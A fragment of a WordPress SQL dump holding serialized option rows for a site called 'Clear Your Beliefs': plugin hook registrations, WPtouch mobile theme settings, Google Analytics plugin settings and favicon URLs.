(9849, 'su_presets_button', 'a:1:{s:9:"last_used";a:3:{s:2:"id";s:9:"last_used";s:4:"name";s:18:"Last used settings";s:8:"settings";a:17:{s:3:"url";s:24:"http://clearbeliefs.com/";s:6:"target";s:4:"self";s:5:"style";s:7:"default";s:10:"background";s:7:"#253aa4";s:5:"color";s:7:"#FFFFFF";s:4:"size";s:1:"4";s:4:"wide";s:2:"no";s:6:"center";s:2:"no";s:6:"radius";s:4:"auto";s:4:"icon";s:0:"";s:10:"icon_color";s:7:"#FFFFFF";s:11:"text_shadow";s:4:"none";s:4:"desc";s:0:"";s:7:"onclick";s:0:"";s:3:"rel";s:0:"";s:5:"class";s:0:"";s:7:"content";s:11:"Button text";}}}', 'yes'),
(10316, 'siteorigin_panels_notice_dismissed', '1.5.3', 'no'),
(11067, 'wpts_compat', 'O:28:"WPtouchDefaultSettingsCompat":2:{s:12:"plugin_hooks";a:13:{s:13:"Ready-USAepay";O:8:"stdClass":1:{s:7:"filters";a:2:{i:0;O:8:"stdClass":3:{s:4:"hook";s:37:"pre_set_site_transient_update_plugins";s:13:"hook_function";s:27:"checkForPluginUpdateUSAepay";s:8:"priority";b:0;}i:1;O:8:"stdClass":3:{s:4:"hook";s:11:"plugins_api";s:13:"hook_function";s:22:"myPluginApiCallUSAepay";s:8:"priority";s:1:"3";}}}s:27:"black-studio-tinymce-widget";O:8:"stdClass":2:{s:7:"actions";a:1:{i:0;O:8:"stdClass":3:{s:4:"hook";s:54:"admin_init'', array( $this, ''wp_pre_'' . str_replace( ''.";s:13:"hook_function";s:0:"";s:8:"priority";b:0;}}s:7:"filters";a:1:{i:0;O:8:"stdClass":3:{s:4:"hook";s:16:"atd_load_scripts";s:13:"hook_function";s:13:"__return_true";s:8:"priority";b:0;}}}s:10:"commercial";O:8:"stdClass":1:{s:7:"filters";a:2:{i:0;O:8:"stdClass":3:{s:4:"hook";s:37:"pre_set_site_transient_update_plugins";s:13:"hook_function";s:30:"checkForPluginUpdateCommercial";s:8:"priority";b:0;}i:1;O:8:"stdClass":3:{s:4:"hook";s:11:"plugins_api";s:13:"hook_function";s:25:"myPluginApiCallCommercial";s:8:"priority";s:1:"3";}}}s:10:"form-maker";O:8:"stdClass":2:{s:7:"actions";a:20:{i:0;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_menu";s:13:"hook_function";s:24:"form_maker_options_panel";s:8:"priority";b:0;}i:1;O:8:"stdClass":3:{s:4:"hook";s:17:"wp_ajax_get_stats";s:13:"hook_function";s:10:"form_maker";s:8:"priority";b:0;}i:2;O:8:"stdClass":3:{s:4:"hook";s:20:"wp_ajax_generete_csv";s:13:"hook_function";s:15:"form_maker_ajax";s:8:"priority";b:0;}i:3;O:8:"stdClass":3:{s:4:"hook";s:20:"wp_ajax_generete_xml";s:13:"hook_function";s:15:"form_maker_ajax";s:8:"priority";b:0;}i:4;O:8:"stdClass":3:{s:4:"hook";s:24:"wp_ajax_FormMakerPreview";s:13:"hook_function";s:15:"form_maker_ajax";s:8:"priority";b:0;}i:5;O:8:"stdClass":3:{s:4:"hook";s:26:"wp_ajax_formmakerwdcaptcha";s:13:"hook_function";s:15:"form_maker_ajax";s:8:"priority";b:0;}i:6;O:8:"stdClass":3:{s:4:"hook";s:33:"wp_ajax_nopriv_formmakerwdcaptcha";s:13:"hook_function";s:15:"form_maker_ajax";s:8:"priority";b:0;}i:7;O:8:"stdClass":3:{s:4:"hook";s:30:"wp_ajax_fromeditcountryinpopup";s:13:"hook_function";s:15:"form_maker_ajax";s:8:"priority";b:0;}i:8;O:8:"stdClass":3:{s:4:"hook";s:22:"wp_ajax_product_option";s:13:"hook_function";s:15:"form_maker_ajax";s:8:"priority";b:0;}i:9;O:8:"stdClass":3:{s:4:"hook";s:26:"wp_ajax_frommapeditinpopup";s:13:"hook_function";s:15:"form_maker_ajax";s:8:"priority";b:0;}i:10;O:8:"stdClass":3:{s:4:"hook";s:25:"wp_ajax_fromipinfoinpopup";s:13:"hook_function";s:15:"form_maker_ajax";s:8:"priority";b:0;}i:11;O:8:"stdClass":3:{s:4:"hook";s:19:"wp_ajax_show_matrix";s:13:"hook_function";s:15:"form_maker_ajax";s:8:"priority";b:0;}i:12;O:8:"stdClass":3:{s:4:"hook";s:24:"wp_ajax_FormMakerEditCSS";s:13:"hook_function";s:15:"form_maker_ajax";s:8:"priority";b:0;}i:13;O:8:"stdClass":3:{s:4:"hook";s:27:"wp_ajax_FormMakerSQLMapping";s:13:"hook_function";s:15:"form_maker_ajax";s:8:"priority";b:0;}i:14;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_head";s:13:"hook_function";s:21:"form_maker_admin_ajax";s:8:"priority";b:0;}i:15;O:8:"stdClass":3:{s:4:"hook";s:4:"init";s:13:"hook_function";s:16:"do_output_buffer";s:8:"priority";b:0;}i:16;O:8:"stdClass":3:{s:4:"hook";s:23:"wp_ajax_formmakerwindow";s:13:"hook_function";s:15:"form_maker_ajax";s:8:"priority";b:0;}i:17;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_init";s:13:"hook_function";s:19:"form_maker_activate";s:8:"priority";b:0;}i:18;O:8:"stdClass":3:{s:4:"hook";s:18:"wp_enqueue_scripts";s:13:"hook_function";s:28:"form_maker_front_end_scripts";s:8:"priority";b:0;}i:19;O:8:"stdClass":3:{s:4:"hook";s:4:"init";s:13:"hook_function";s:24:"form_maker_language_load";s:8:"priority";b:0;}}s:7:"filters";a:6:{i:0;O:8:"stdClass":3:{s:4:"hook";s:11:"the_content";s:13:"hook_function";s:25:"Form_maker_fornt_end_main";s:8:"priority";s:4:"5000";}i:1;O:8:"stdClass":3:{s:4:"hook";s:20:"mce_external_plugins";s:13:"hook_function";s:19:"form_maker_register";s:8:"priority";b:0;}i:2;O:8:"stdClass":3:{s:4:"hook";s:11:"mce_buttons";s:13:"hook_function";s:21:"form_maker_add_button";s:8:"priority";b:0;}i:3;O:8:"stdClass":3:{s:4:"hook";s:11:"the_content";s:13:"hook_function";s:7:"wpautop";s:8:"priority";s:2:"10";}i:4;O:8:"stdClass":3:{s:4:"hook";s:11:"the_content";s:13:"hook_function";s:12:"do_shortcode";s:8:"priority";s:2:"11";}i:5;O:8:"stdClass":3:{s:4:"hook";s:7:"wp_head";s:13:"hook_function";s:26:"form_maker_generate_action";s:8:"priority";s:5:"10000";}}}s:27:"infusionsoft-for-developers";O:8:"stdClass":0:{}s:15:"ready-ecommerce";O:8:"stdClass":0:{}s:19:"shortcodes-ultimate";O:8:"stdClass":2:{s:7:"actions";a:3:{i:0;O:8:"stdClass":3:{s:4:"hook";s:4:"init";s:13:"hook_function";s:19:"su_apply_formatting";s:8:"priority";b:0;}i:1;O:8:"stdClass":3:{s:4:"hook";s:4:"init";s:13:"hook_function";s:19:"su_apply_formatting";s:8:"priority";b:0;}i:2;O:8:"stdClass":3:{s:4:"hook";s:17:"delete_attachment";s:13:"hook_function";s:24:"su_delete_resized_images";s:8:"priority";b:0;}}s:7:"filters";a:8:{i:0;O:8:"stdClass":3:{s:4:"hook";s:11:"widget_text";s:13:"hook_function";s:12:"do_shortcode";s:8:"priority";b:0;}i:1;O:8:"stdClass":3:{s:4:"hook";s:20:"category_description";s:13:"hook_function";s:12:"do_shortcode";s:8:"priority";b:0;}i:2;O:8:"stdClass":3:{s:4:"hook";s:11:"the_content";s:13:"hook_function";s:19:"su_custom_formatter";s:8:"priority";s:3:"99 ";}i:3;O:8:"stdClass":3:{s:4:"hook";s:11:"widget_text";s:13:"hook_function";s:19:"su_custom_formatter";s:8:"priority";s:3:"99 ";}i:4;O:8:"stdClass":3:{s:4:"hook";s:20:"category_description";s:13:"hook_function";s:19:"su_custom_formatter";s:8:"priority";s:3:"99 ";}i:5;O:8:"stdClass":3:{s:4:"hook";s:11:"widget_text";s:13:"hook_function";s:12:"do_shortcode";s:8:"priority";b:0;}i:6;O:8:"stdClass":3:{s:4:"hook";s:20:"category_description";s:13:"hook_function";s:12:"do_shortcode";s:8:"priority";b:0;}i:7;O:8:"stdClass":3:{s:4:"hook";s:11:"the_content";s:13:"hook_function";s:19:"su_clean_shortcodes";s:8:"priority";b:0;}}}s:17:"simple-custom-css";O:8:"stdClass":2:{s:7:"actions";a:6:{i:0;O:8:"stdClass":3:{s:4:"hook";s:4:"init";s:13:"hook_function";s:16:"sccss_textdomain";s:8:"priority";b:0;}i:1;O:8:"stdClass":3:{s:4:"hook";s:18:"wp_enqueue_scripts";s:13:"hook_function";s:20:"sccss_register_style";s:8:"priority";s:3:"99 ";}i:2;O:8:"stdClass":3:{s:4:"hook";s:21:"admin_enqueue_scripts";s:13:"hook_function";s:25:"sccss_register_codemirror";s:8:"priority";b:0;}i:3;O:8:"stdClass":3:{s:4:"hook";s:17:"template_redirect";s:13:"hook_function";s:19:"sccss_trigger_check";s:8:"priority";b:0;}i:4;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_menu";s:13:"hook_function";s:27:"sccss_register_submenu_page";s:8:"priority";b:0;}i:5;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_init";s:13:"hook_function";s:23:"sccss_register_settings";s:8:"priority";b:0;}}s:7:"filters";a:2:{i:0;O:8:"stdClass":3:{s:4:"hook";s:27:"plugin_action_links_$plugin";s:13:"hook_function";s:19:"sccss_settings_link";s:8:"priority";b:0;}i:1;O:8:"stdClass":3:{s:4:"hook";s:10:"query_vars";s:13:"hook_function";s:17:"sccss_add_trigger";s:8:"priority";b:0;}}}s:17:"siteorigin-panels";O:8:"stdClass":2:{s:7:"filters";a:12:{i:0;O:8:"stdClass":3:{s:4:"hook";s:22:"siteorigin_panels_data";s:13:"hook_function";s:35:"siteorigin_panels_style_update_data";s:8:"priority";b:0;}i:1;O:8:"stdClass":3:{s:4:"hook";s:33:"siteorigin_panels_prebuilt_layout";s:13:"hook_function";s:35:"siteorigin_panels_style_update_data";s:8:"priority";b:0;}i:2;O:8:"stdClass":3:{s:4:"hook";s:39:"siteorigin_panels_panels_data_from_post";s:13:"hook_function";s:37:"siteorigin_panels_style_sanitize_data";s:8:"priority";b:0;}i:3;O:8:"stdClass":3:{s:4:"hook";s:16:"content_save_pre";s:13:"hook_function";s:34:"siteorigin_panels_content_save_pre";s:8:"priority";b:0;}i:4;O:8:"stdClass":3:{s:4:"hook";s:24:"_wp_post_revision_fields";s:13:"hook_function";s:34:"siteorigin_panels_revisions_fields";s:8:"priority";b:0;}i:5;O:8:"stdClass":3:{s:4:"hook";s:41:"_wp_post_revision_field_panels_data_field";s:13:"hook_function";s:33:"siteorigin_panels_revisions_field";s:8:"priority";s:2:"3 ";}i:6;O:8:"stdClass":3:{s:4:"hook";s:20:"tiny_mce_before_init";s:13:"hook_function";s:32:"black_studio_tinymce_init_editor";s:8:"priority";s:3:"20 ";}i:7;O:8:"stdClass":3:{s:4:"hook";s:11:"the_content";s:13:"hook_function";s:32:"siteorigin_panels_filter_content";s:8:"priority";b:0;}i:8;O:8:"stdClass":3:{s:4:"hook";s:14:"show_admin_bar";s:13:"hook_function";s:34:"siteorigin_panels_preview_adminbar";s:8:"priority";b:0;}i:9;O:8:"stdClass":3:{s:4:"hook";s:10:"body_class";s:13:"hook_function";s:28:"siteorigin_panels_body_class";s:8:"priority";b:0;}i:10;O:8:"stdClass":3:{s:4:"hook";s:34:"siteorigin_panels_prebuilt_layouts";s:13:"hook_function";s:37:"siteorigin_panels_cloned_page_layouts";s:8:"priority";s:2:"20";}i:11;O:8:"stdClass":3:{s:4:"hook";s:19:"wp_import_post_meta";s:13:"hook_function";s:37:"siteorigin_panels_wp_import_post_meta";s:8:"priority";b:0;}}s:7:"actions";a:51:{i:0;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_menu";s:13:"hook_function";s:36:"siteorigin_panels_options_admin_menu";s:8:"priority";b:0;}i:1;O:8:"stdClass":3:{s:4:"hook";s:36:"load-settings_page_siteorigin_panels";s:13:"hook_function";s:30:"siteorigin_panels_save_options";s:8:"priority";b:0;}i:2;O:8:"stdClass":3:{s:4:"hook";s:34:"siteorigin_panels_before_interface";s:13:"hook_function";s:31:"siteorigin_panels_update_notice";s:8:"priority";b:0;}i:3;O:8:"stdClass":3:{s:4:"hook";s:34:"siteorigin_panels_before_interface";s:13:"hook_function";s:40:"siteorigin_panels_incompatibility_notice";s:8:"priority";b:0;}i:4;O:8:"stdClass":3:{s:4:"hook";s:47:"wp_ajax_siteorigin_panels_update_notice_dismiss";s:13:"hook_function";s:46:"siteorigin_panels_update_notice_dismiss_action";s:8:"priority";b:0;}i:5;O:8:"stdClass":3:{s:4:"hook";s:53:"wp_ajax_siteorigin_panels_incompatible_notice_dismiss";s:13:"hook_function";s:55:"siteorigin_panels_incompatibility_notice_dismiss_action";s:8:"priority";b:0;}i:6;O:8:"stdClass":3:{s:4:"hook";s:49:"wp_ajax_nopriv_siteorigin_panels_get_post_content";s:13:"hook_function";s:38:"siteorigin_panels_content_save_pre_get";s:8:"priority";b:0;}i:7;O:8:"stdClass":3:{s:4:"hook";s:29:"siteorigin_panels_metabox_end";s:13:"hook_function";s:22:"siteorigin_panels_dump";s:8:"priority";b:0;}i:8;O:8:"stdClass":3:{s:4:"hook";s:9:"save_post";s:13:"hook_function";s:37:"siteorigin_panels_revisions_save_post";s:8:"priority";s:2:"2 ";}i:9;O:8:"stdClass":3:{s:4:"hook";s:24:"wp_restore_post_revision";s:13:"hook_function";s:35:"siteorigin_panels_revisions_restore";s:8:"priority";s:2:"2 ";}i:10;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_init";s:13:"hook_function";s:36:"siteorigin_panels_transfer_home_page";s:8:"priority";b:0;}i:11;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_head";s:13:"hook_function";s:34:"black_studio_tinymce_load_tiny_mce";s:8:"priority";b:0;}i:12;O:8:"stdClass":3:{s:4:"hook";s:19:"admin_print_scripts";s:13:"hook_function";s:28:"black_studio_tinymce_scripts";s:8:"priority";b:0;}i:13;O:8:"stdClass":3:{s:4:"hook";s:18:"admin_print_styles";s:13:"hook_function";s:27:"black_studio_tinymce_styles";s:8:"priority";b:0;}i:14;O:8:"stdClass":3:{s:4:"hook";s:26:"admin_print_footer_scripts";s:13:"hook_function";s:35:"black_studio_tinymce_footer_scripts";s:8:"priority";b:0;}i:15;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_init";s:13:"hook_function";s:49:"siteorigin_panels_black_studio_tinymce_admin_init";s:8:"priority";b:0;}i:16;O:8:"stdClass":3:{s:4:"hook";s:21:"admin_enqueue_scripts";s:13:"hook_function";s:52:"siteorigin_panels_black_studio_tinymce_admin_enqueue";s:8:"priority";s:2:"15";}i:17;O:8:"stdClass":3:{s:4:"hook";s:12:"widgets_init";s:13:"hook_function";s:19:"origin_widgets_init";s:8:"priority";b:0;}i:18;O:8:"stdClass":3:{s:4:"hook";s:21:"admin_enqueue_scripts";s:13:"hook_function";s:22:"origin_widgets_enqueue";s:8:"priority";b:0;}i:19;O:8:"stdClass":3:{s:4:"hook";s:4:"init";s:13:"hook_function";s:26:"origin_widgets_display_css";s:8:"priority";b:0;}i:20;O:8:"stdClass":3:{s:4:"hook";s:12:"widgets_init";s:13:"hook_function";s:30:"siteorigin_panels_widgets_init";s:8:"priority";b:0;}i:21;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_init";s:13:"hook_function";s:35:"siteorigin_panels_comatibility_init";s:8:"priority";s:1:"5";}i:22;O:8:"stdClass":3:{s:4:"hook";s:14:"plugins_loaded";s:13:"hook_function";s:22:"siteorigin_panels_init";s:8:"priority";b:0;}i:23;O:8:"stdClass":3:{s:4:"hook";s:14:"plugins_loaded";s:13:"hook_function";s:27:"siteorigin_panels_init_lang";s:8:"priority";b:0;}i:24;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_menu";s:13:"hook_function";s:28:"siteorigin_panels_admin_menu";s:8:"priority";b:0;}i:25;O:8:"stdClass":3:{s:4:"hook";s:14:"add_meta_boxes";s:13:"hook_function";s:27:"siteorigin_panels_metaboxes";s:8:"priority";b:0;}i:26;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_init";s:13:"hook_function";s:32:"siteorigin_panels_save_home_page";s:8:"priority";b:0;}i:27;O:8:"stdClass":3:{s:4:"hook";s:18:"after_switch_theme";s:13:"hook_function";s:45:"siteorigin_panels_update_home_on_theme_change";s:8:"priority";b:0;}i:28;O:8:"stdClass":3:{s:4:"hook";s:32:"admin_print_scripts-post-new.php";s:13:"hook_function";s:39:"siteorigin_panels_admin_enqueue_scripts";s:8:"priority";b:0;}i:29;O:8:"stdClass":3:{s:4:"hook";s:28:"admin_print_scripts-post.php";s:13:"hook_function";s:39:"siteorigin_panels_admin_enqueue_scripts";s:8:"priority";b:0;}i:30;O:8:"stdClass":3:{s:4:"hook";s:55:"admin_print_scripts-appearance_page_so_panels_home_page";s:13:"hook_function";s:39:"siteorigin_panels_admin_enqueue_scripts";s:8:"priority";b:0;}i:31;O:8:"stdClass":3:{s:4:"hook";s:31:"admin_print_styles-post-new.php";s:13:"hook_function";s:38:"siteorigin_panels_admin_enqueue_styles";s:8:"priority";b:0;}i:32;O:8:"stdClass":3:{s:4:"hook";s:27:"admin_print_styles-post.php";s:13:"hook_function";s:38:"siteorigin_panels_admin_enqueue_styles";s:8:"priority";b:0;}i:33;O:8:"stdClass":3:{s:4:"hook";s:54:"admin_print_styles-appearance_page_so_panels_home_page";s:13:"hook_function";s:38:"siteorigin_panels_admin_enqueue_styles";s:8:"priority";b:0;}i:34;O:8:"stdClass":3:{s:4:"hook";s:13:"load-page.php";s:13:"hook_function";s:30:"siteorigin_panels_add_help_tab";s:8:"priority";s:2:"12";}i:35;O:8:"stdClass":3:{s:4:"hook";s:17:"load-post-new.php";s:13:"hook_function";s:30:"siteorigin_panels_add_help_tab";s:8:"priority";s:2:"12";}i:36;O:8:"stdClass":3:{s:4:"hook";s:40:"load-appearance_page_so_panels_home_page";s:13:"hook_function";s:30:"siteorigin_panels_add_help_tab";s:8:"priority";s:2:"12";}i:37;O:8:"stdClass":3:{s:4:"hook";s:9:"save_post";s:13:"hook_function";s:27:"siteorigin_panels_save_post";s:8:"priority";s:2:"2 ";}i:38;O:8:"stdClass":3:{s:4:"hook";s:34:"wp_ajax_siteorigin_panels_post_css";s:13:"hook_function";s:21:"siteorigin_panels_css";s:8:"priority";b:0;}i:39;O:8:"stdClass":3:{s:4:"hook";s:41:"wp_ajax_nopriv_siteorigin_panels_post_css";s:13:"hook_function";s:21:"siteorigin_panels_css";s:8:"priority";b:0;}i:40;O:8:"stdClass":3:{s:4:"hook";s:18:"wp_enqueue_scripts";s:13:"hook_function";s:38:"siteorigin_panels_prepare_home_content";s:8:"priority";s:2:"11";}i:41;O:8:"stdClass":3:{s:4:"hook";s:18:"wp_enqueue_scripts";s:13:"hook_function";s:45:"siteorigin_panels_prepare_single_post_content";s:8:"priority";b:0;}i:42;O:8:"stdClass":3:{s:4:"hook";s:7:"wp_head";s:13:"hook_function";s:34:"siteorigin_panels_print_inline_css";s:8:"priority";s:2:"12";}i:43;O:8:"stdClass":3:{s:4:"hook";s:9:"wp_footer";s:13:"hook_function";s:34:"siteorigin_panels_print_inline_css";s:8:"priority";b:0;}i:44;O:8:"stdClass":3:{s:4:"hook";s:14:"admin_bar_menu";s:13:"hook_function";s:32:"siteorigin_panels_admin_bar_menu";s:8:"priority";s:3:"100";}i:45;O:8:"stdClass":3:{s:4:"hook";s:22:"siteorigin_panels_data";s:13:"hook_function";s:40:"siteorigin_panels_home_preview_load_data";s:8:"priority";b:0;}i:46;O:8:"stdClass":3:{s:4:"hook";s:17:"template_redirect";s:13:"hook_function";s:25:"siteorigin_panels_preview";s:8:"priority";b:0;}i:47;O:8:"stdClass":3:{s:4:"hook";s:18:"wp_enqueue_scripts";s:13:"hook_function";s:32:"siteorigin_panels_enqueue_styles";s:8:"priority";s:1:"1";}i:48;O:8:"stdClass":3:{s:4:"hook";s:31:"siteorigin_panels_after_widgets";s:13:"hook_function";s:37:"siteorigin_panels_recommended_widgets";s:8:"priority";b:0;}i:49;O:8:"stdClass":3:{s:4:"hook";s:26:"wp_ajax_so_panels_prebuilt";s:13:"hook_function";s:38:"siteorigin_panels_ajax_action_prebuilt";s:8:"priority";b:0;}i:50;O:8:"stdClass":3:{s:4:"hook";s:29:"wp_ajax_so_panels_widget_form";s:13:"hook_function";s:34:"siteorigin_panels_ajax_widget_form";s:8:"priority";b:0;}}}s:10:"user-photo";O:8:"stdClass":2:{s:7:"actions";a:9:{i:0;O:8:"stdClass":3:{s:4:"hook";s:4:"init";s:13:"hook_function";s:15:"userphoto__init";s:8:"priority";b:0;}i:1;O:8:"stdClass":3:{s:4:"hook";s:14:"profile_update";s:13:"hook_function";s:24:"userphoto_profile_update";s:8:"priority";b:0;}i:2;O:8:"stdClass":3:{s:4:"hook";s:11:"delete_user";s:13:"hook_function";s:21:"userphoto_delete_user";s:8:"priority";b:0;}i:3;O:8:"stdClass":3:{s:4:"hook";s:45:"admin_head-options_page_user-photo/user-photo";s:13:"hook_function";s:28:"userphoto_admin_options_head";s:8:"priority";b:0;}i:4;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_head";s:13:"hook_function";s:29:"userphoto_admin_useredit_head";s:8:"priority";b:0;}i:5;O:8:"stdClass":3:{s:4:"hook";s:20:"admin_head-userphoto";s:13:"hook_function";s:20:"userphoto_admin_head";s:8:"priority";b:0;}i:6;O:8:"stdClass":3:{s:4:"hook";s:17:"show_user_profile";s:13:"hook_function";s:35:"userphoto_display_selector_fieldset";s:8:"priority";b:0;}i:7;O:8:"stdClass":3:{s:4:"hook";s:17:"edit_user_profile";s:13:"hook_function";s:35:"userphoto_display_selector_fieldset";s:8:"priority";b:0;}i:8;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_menu";s:13:"hook_function";s:18:"userphoto_add_page";s:8:"priority";b:0;}}s:7:"filters";a:1:{i:0;O:8:"stdClass":3:{s:4:"hook";s:10:"get_avatar";s:13:"hook_function";s:27:"userphoto_filter_get_avatar";s:8:"priority";s:1:"4";}}}s:19:"visual-form-builder";O:8:"stdClass":1:{s:7:"actions";a:1:{i:0;O:8:"stdClass":3:{s:4:"hook";s:12:"widgets_init";s:13:"hook_function";s:20:"vfb_register_widgets";s:8:"priority";b:0;}}}s:16:"wp-fastest-cache";O:8:"stdClass":0:{}s:35:"wp-time-slots-availability-calendar";O:8:"stdClass":1:{s:7:"actions";a:10:{i:0;O:8:"stdClass":3:{s:4:"hook";s:22:"wp_ajax_changeDayAdmin";s:13:"hook_function";s:23:"changeDayAdmin_callback";s:8:"priority";b:0;}i:1;O:8:"stdClass":3:{s:4:"hook";s:17:"wp_ajax_changeDay";s:13:"hook_function";s:18:"changeDay_callback";s:8:"priority";b:0;}i:2;O:8:"stdClass":3:{s:4:"hook";s:24:"wp_ajax_nopriv_changeDay";s:13:"hook_function";s:18:"changeDay_callback";s:8:"priority";b:0;}i:3;O:8:"stdClass":3:{s:4:"hook";s:14:"plugins_loaded";s:13:"hook_function";s:14:"tsa_textdomain";s:8:"priority";b:0;}i:4;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_menu";s:13:"hook_function";s:8:"tsa_menu";s:8:"priority";b:0;}i:5;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_init";s:13:"hook_function";s:16:"tsa_admin_styles";s:8:"priority";b:0;}i:6;O:8:"stdClass":3:{s:4:"hook";s:4:"init";s:13:"hook_function";s:10:"tsa_styles";s:8:"priority";b:0;}i:7;O:8:"stdClass":3:{s:4:"hook";s:7:"wp_head";s:13:"hook_function";s:18:"pluginname_ajaxurl";s:8:"priority";b:0;}i:8;O:8:"stdClass":3:{s:4:"hook";s:10:"admin_menu";s:13:"hook_function";s:22:"tsa_tokenGeneratorInit";s:8:"priority";b:0;}i:9;O:8:"stdClass":3:{s:4:"hook";s:12:"widgets_init";s:13:"hook_function";s:14:"tsa_widgetInit";s:8:"priority";b:0;}}}}s:15:"enabled_plugins";a:13:{s:13:"Ready-USAepay";i:1;s:27:"black-studio-tinymce-widget";i:1;s:10:"commercial";i:1;s:10:"form-maker";i:1;s:27:"infusionsoft-for-developers";i:1;s:15:"ready-ecommerce";i:1;s:19:"shortcodes-ultimate";i:1;s:17:"simple-custom-css";i:1;s:17:"siteorigin-panels";i:1;s:10:"user-photo";i:1;s:19:"visual-form-builder";i:1;s:16:"wp-fastest-cache";i:1;s:35:"wp-time-slots-availability-calendar";i:1;}}', 'yes'),
(11068, 'wpts_wptouch_pro', 'O:24:"WPtouchDefaultSettings30":54:{s:13:"settings_mode";s:1:"0";s:12:"display_mode";s:6:"normal";s:10:"site_title";s:18:"Clear Your Beliefs";s:22:"show_wptouch_in_footer";i:0;s:17:"add_referral_code";b:0;s:21:"desktop_is_first_view";b:0;s:16:"show_switch_link";b:1;s:18:"switch_link_method";s:9:"automatic";s:25:"mobile_switch_link_target";s:12:"current_page";s:12:"force_locale";s:4:"auto";s:15:"translate_admin";b:1;s:17:"custom_stats_code";s:0:"";s:16:"homepage_landing";s:6:"select";s:27:"homepage_redirect_wp_target";s:4:"1450";s:31:"homepage_redirect_custom_target";s:0:"";s:29:"automatically_backup_settings";b:1;s:12:"use_jquery_2";b:0;s:22:"show_footer_load_times";b:0;s:12:"preview_mode";s:3:"off";s:36:"include_functions_from_desktop_theme";b:0;s:28:"functions_php_loading_method";s:9:"translate";s:17:"remove_shortcodes";s:0:"";s:17:"enable_url_filter";i:0;s:13:"filtered_urls";s:0:"";s:20:"url_filter_behaviour";s:12:"exclude_urls";s:18:"custom_user_agents";s:0:"";s:27:"current_theme_friendly_name";s:7:"Bauhaus";s:22:"current_theme_location";s:23:"/plugins/wptouch/themes";s:18:"current_theme_name";s:7:"bauhaus";s:23:"dismissed_notifications";a:0:{}s:16:"custom_menu_name";s:2:"wp";s:18:"appended_menu_name";s:4:"none";s:19:"prepended_menu_name";s:4:"none";s:19:"enable_parent_items";b:1;s:17:"enable_menu_icons";b:1;s:17:"default_menu_icon";s:61:"/wp-content/plugins/wptouch/resources/icons/elegant/Paper.png";s:19:"disabled_menu_items";a:0:{}s:24:"temp_disabled_menu_items";a:0:{}s:9:"debug_log";b:0;s:15:"debug_log_level";i:6;s:14:"debug_log_salt";s:10:"b4a7e5682e";s:10:"menu_icons";a:0:{}s:15:"menu_sort_order";s:9:"wordpress";s:28:"menu_disable_parent_as_child";b:0;s:12:"disable_menu";b:0;s:20:"make_links_clickable";b:0;s:15:"custom_css_file";s:0:"";s:32:"wptouch_enable_custom_post_types";b:0;s:27:"always_refresh_css_js_files";b:0;s:27:"classic_excluded_categories";b:0;s:30:"convert_menu_links_to_internal";b:0;s:23:"post_thumbnails_enabled";b:1;s:13:"active_addons";a:0:{}s:23:"show_wpml_lang_switcher";b:1;}', 'yes');
INSERT INTO `cyb_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(11506, 'yst_ga', 'a:1:{s:10:"ga_general";a:25:{s:10:"ga_general";a:21:{s:17:"analytics_profile";N;s:14:"manual_ua_code";i:0;s:20:"manual_ua_code_field";N;s:26:"track_internal_as_outbound";N;s:23:"track_internal_as_label";N;s:14:"track_outbound";i:0;s:14:"anonymous_data";i:0;s:16:"enable_universal";i:0;s:12:"demographics";i:0;s:12:"ignore_users";a:1:{i:0;s:6:"editor";}s:13:"anonymize_ips";i:0;s:17:"track_download_as";s:5:"event";s:19:"extensions_of_files";s:30:"doc,exe,js,pdf,ppt,tgz,zip,xls";s:14:"track_full_url";s:6:"domain";s:18:"subdomain_tracking";N;s:16:"tag_links_in_rss";i:0;s:12:"allow_anchor";i:0;s:16:"add_allow_linker";i:0;s:11:"custom_code";N;s:10:"debug_mode";i:0;s:12:"firebug_lite";i:0;}s:17:"analytics_profile";N;s:14:"manual_ua_code";i:0;s:20:"manual_ua_code_field";s:0:"";s:26:"track_internal_as_outbound";s:0:"";s:23:"track_internal_as_label";s:0:"";s:14:"track_outbound";i:0;s:14:"anonymous_data";i:0;s:16:"enable_universal";i:0;s:12:"demographics";i:0;s:12:"ignore_users";a:1:{i:0;s:6:"editor";}s:13:"anonymize_ips";i:0;s:17:"track_download_as";s:5:"event";s:19:"extensions_of_files";s:30:"doc,exe,js,pdf,ppt,tgz,zip,xls";s:14:"track_full_url";s:6:"domain";s:18:"subdomain_tracking";s:0:"";s:16:"tag_links_in_rss";i:0;s:12:"allow_anchor";i:0;s:16:"add_allow_linker";i:0;s:11:"custom_code";s:0:"";s:10:"debug_mode";i:0;s:12:"firebug_lite";i:0;s:7:"version";s:5:"5.1.1";s:14:"yoast_ga_nonce";s:10:"c83032b52b";s:16:"ga-form-settings";s:12:"Save changes";}}', 'yes'),
(11469, 'aio-favicon_settings', 'a:9:{s:17:"aioFaviconVersion";s:3:"4.3";s:9:"debugMode";b:0;s:21:"removeReflectiveShine";b:0;s:21:"removeLinkFromMetaBox";s:4:"true";i:0;b:0;s:11:"frontendICO";s:67:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/favicon1.png";s:11:"frontendGIF";s:67:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/favicon2.png";s:11:"frontendPNG";s:67:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/favicon3.png";s:13:"frontendApple";s:67:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/favicon4.png";}', 'yes'),
(11507, 'yst_ga_api', 'a:0:{}', 'no'),
(11515, 'super_simple_google_analytics_item', 'a:6:{s:11:"insert_code";i:1;s:7:"account";s:8:"56831560";s:7:"profile";s:1:"1";s:8:"location";s:4:"body";s:11:"track_admin";i:0;s:13:"track_adsense";i:0;}', 'yes'),
